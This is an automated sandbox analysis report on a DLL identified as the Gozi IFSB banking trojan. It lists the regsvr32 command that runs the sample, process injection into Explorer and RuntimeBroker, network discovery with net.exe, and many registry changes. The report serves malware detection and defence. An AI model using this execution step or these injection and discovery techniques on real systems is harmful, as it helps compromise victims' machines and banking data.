Malware Analysis Report

2024-10-23 15:37

Sample ID 220803-lf232aafem
Target 62ea3f935563b.dll
SHA256 982ff4dcc3dc076b3c40f5cd5993d05f7578dd83b631146105b3840864c76203
Tags gozi_ifsb 3000 banker trojan
Score 10/10

Table of Contents

Analysis Overview
MITRE ATT&CK
    Enterprise Matrix V6
Analysis: static1
    Detonation Overview
    Signatures
Analysis: behavioral1
    Detonation Overview
    Command Line
    Signatures
    Processes
    Network
    Files
Analysis: behavioral2
    Detonation Overview
    Command Line
    Signatures
    Processes
    Network
    Files

Analysis Overview

score
10/10

SHA256

982ff4dcc3dc076b3c40f5cd5993d05f7578dd83b631146105b3840864c76203

Threat Level: Known bad

The file 62ea3f935563b.dll was found to be: Known bad.

Malicious Activity Summary

gozi_ifsb 3000 banker trojan

Gozi, Gozi IFSB

Checks computer location settings

Suspicious use of SetThreadContext

Enumerates physical storage devices

Suspicious use of AdjustPrivilegeToken

Suspicious use of SetWindowsHookEx

Enumerates processes with tasklist

Runs net.exe

Suspicious behavior: GetForegroundWindowSpam

Suspicious behavior: MapViewOfSection

Suspicious use of WriteProcessMemory

Discovers systems in the same network

Gathers system information

Suspicious behavior: EnumeratesProcesses

Modifies registry class

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2022-08-03 09:29

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2022-08-03 09:29

Reported

2022-08-03 09:31

Platform

win7-20220715-en

Max time kernel

45s

Max time network

49s

Command Line

regsvr32 /s C:\Users\Admin\AppData\Local\Temp\62ea3f935563b.dll

Signatures

Gozi, Gozi IFSB

banker trojan gozi_ifsb

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1908 wrote to memory of 1004 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 1908 wrote to memory of 1004 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 1908 wrote to memory of 1004 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 1908 wrote to memory of 1004 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 1908 wrote to memory of 1004 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 1908 wrote to memory of 1004 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 1908 wrote to memory of 1004 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe

Processes

C:\Windows\system32\regsvr32.exe

regsvr32 /s C:\Users\Admin\AppData\Local\Temp\62ea3f935563b.dll

C:\Windows\SysWOW64\regsvr32.exe

/s C:\Users\Admin\AppData\Local\Temp\62ea3f935563b.dll

Network

N/A

Files

memory/1908-54-0x000007FEFB6E1000-0x000007FEFB6E3000-memory.dmp

memory/1004-55-0x0000000000000000-mapping.dmp

memory/1004-56-0x0000000074DB1000-0x0000000074DB3000-memory.dmp

memory/1004-57-0x0000000010000000-0x000000001000E000-memory.dmp

memory/1004-62-0x0000000000190000-0x000000000019D000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2022-08-03 09:29

Reported

2022-08-03 09:31

Platform

win10v2004-20220721-en

Max time kernel

150s

Max time network

154s

Command Line

C:\Windows\System32\RuntimeBroker.exe -Embedding

Signatures

Gozi, Gozi IFSB

banker trojan gozi_ifsb

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000\Control Panel\International\Geo\Nation C:\Windows\System32\mshta.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2160 set thread context of 1032 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Explorer.EXE
PID 1032 set thread context of 3452 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 1032 set thread context of 3752 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 1032 set thread context of 4544 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 1032 set thread context of 4916 N/A C:\Windows\Explorer.EXE C:\Windows\syswow64\cmd.exe

Enumerates physical storage devices

Discovers systems in the same network

discovery

Description Indicator Process Target
N/A N/A C:\Windows\system32\net.exe N/A
N/A N/A C:\Windows\system32\net.exe N/A
N/A N/A C:\Windows\system32\net.exe N/A

Enumerates processes with tasklist

Description Indicator Process Target
N/A N/A C:\Windows\system32\tasklist.exe N/A

Gathers system information

Description Indicator Process Target
N/A N/A C:\Windows\system32\systeminfo.exe N/A

Modifies registry class

Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\390e91e6-0382-4d16- = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\10ee7df4-5ff7-400d- = "0" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\4690926b-90c0-4dc8- = "8324" C:\Windows\System32\RuntimeBroker.exe N/A
Key deleted \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\4690926b-90c0-4dc8- C:\Windows\System32\RuntimeBroker.exe N/A
Key deleted \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\fa158c3c-bf95-4ac3- C:\Windows\System32\RuntimeBroker.exe N/A
Key deleted \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\03bd6acb-41d4-47b9- C:\Windows\System32\RuntimeBroker.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\fa158c3c-bf95-4ac3- C:\Windows\System32\RuntimeBroker.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\6bc68a4b-b0ee-4f30- = [value missing] C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\5a1fb410-c912-48d1- = "0" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\390e91e6-0382-4d16- = "\\\\?\\Volume{BCF85C26-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\7ac56ac6088d2866672963a8250dcfbb3526d3a51b9a3e861858925e66dc0f54" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\f416a38f-aadb-4940- C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\5a1fb410-c912-48d1- = "8324" C:\Windows\System32\RuntimeBroker.exe N/A
Key deleted \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\390e91e6-0382-4d16- C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\f416a38f-aadb-4940- = "\\\\?\\Volume{BCF85C26-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\3ef29ceccf6a26e1eee4948e2a2173e657e681ba1e567da217e4a62103c10cb2" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\5253ac7f-922f-4da2- = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\5253ac7f-922f-4da2- = "\\\\?\\Volume{BCF85C26-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\ee2e1a7d9d3f603ca221d1b8492730e9668343ae08ee9cdca35f68ba826a3e85" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\4690926b-90c0-4dc8- = "0" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\4690926b-90c0-4dc8- = [value missing] C:\Windows\System32\RuntimeBroker.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\390e91e6-0382-4d16- = [value missing] C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\fa158c3c-bf95-4ac3- = "8324" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\c088cdab-3a8c-4c86- = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\f416a38f-aadb-4940- = "0" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\f416a38f-aadb-4940- = [value missing] C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\5253ac7f-922f-4da2- = "8324" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\5a1fb410-c912-48d1- = ff90a47e2ca7d801 C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\10ee7df4-5ff7-400d- C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\5a1fb410-c912-48d1- = "\\\\?\\Volume{BCF85C26-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\891988337bcfabadc26731d12a13cf2af72b95139a9f6220c62e6fba3cc17ce3" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\447bb508-04c2-4c88- = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\537bbff6-9f1e-4421- = [value missing] C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\eafae361-ed19-4d70- = "0" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\537bbff6-9f1e-4421- = e868d9802ca7d801 C:\Windows\System32\RuntimeBroker.exe N/A
Key deleted \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\269dfa06-9572-4768- C:\Windows\System32\RuntimeBroker.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\10ee7df4-5ff7-400d- C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\fa158c3c-bf95-4ac3- C:\Windows\System32\RuntimeBroker.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\c088cdab-3a8c-4c86- = 52fe557f2ca7d801 C:\Windows\System32\RuntimeBroker.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\447bb508-04c2-4c88- = d2325f802ca7d801 C:\Windows\System32\RuntimeBroker.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\eafae361-ed19-4d70- C:\Windows\System32\RuntimeBroker.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\537bbff6-9f1e-4421- C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\537bbff6-9f1e-4421- = "0" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\f416a38f-aadb-4940- = d8acf77a2ca7d801 C:\Windows\System32\RuntimeBroker.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\fa158c3c-bf95-4ac3- = [value missing] C:\Windows\System32\RuntimeBroker.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\5253ac7f-922f-4da2- = [value missing] C:\Windows\System32\RuntimeBroker.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\4690926b-90c0-4dc8- C:\Windows\System32\RuntimeBroker.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\4690926b-90c0-4dc8- = 3937117b2ca7d801 C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\447bb508-04c2-4c88- = "\\\\?\\Volume{BCF85C26-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\ee2e1a7d9d3f603ca221d1b8492730e9668343ae08ee9cdca35f68ba826a3e85" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\5253ac7f-922f-4da2- = "0" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\4690926b-90c0-4dc8- = "\\\\?\\Volume{BCF85C26-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\e456f0c910cf1e03f73ccd374fb3b13d2523a54a4c17bffcdb526f9b4d2e3054" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\5a1fb410-c912-48d1- = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" C:\Windows\System32\RuntimeBroker.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\c088cdab-3a8c-4c86- C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\c088cdab-3a8c-4c86- = "8324" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\447bb508-04c2-4c88- = "8324" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\390e91e6-0382-4d16- = 94fb917a2ca7d801 C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\4690926b-90c0-4dc8- C:\Windows\System32\RuntimeBroker.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\c088cdab-3a8c-4c86- = [value missing] C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\10ee7df4-5ff7-400d- = "8324" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\537bbff6-9f1e-4421- = "\\\\?\\Volume{BCF85C26-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\e456f0c910cf1e03f73ccd374fb3b13d2523a54a4c17bffcdb526f9b4d2e3054" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\447bb508-04c2-4c88- C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\6bc68a4b-b0ee-4f30- = "8324" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\390e91e6-0382-4d16- = "0" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\5a1fb410-c912-48d1- C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\eafae361-ed19-4d70- = "8324" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\537bbff6-9f1e-4421- = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\390e91e6-0382-4d16- C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\fa158c3c-bf95-4ac3- = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" C:\Windows\System32\RuntimeBroker.exe N/A

Runs net.exe

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
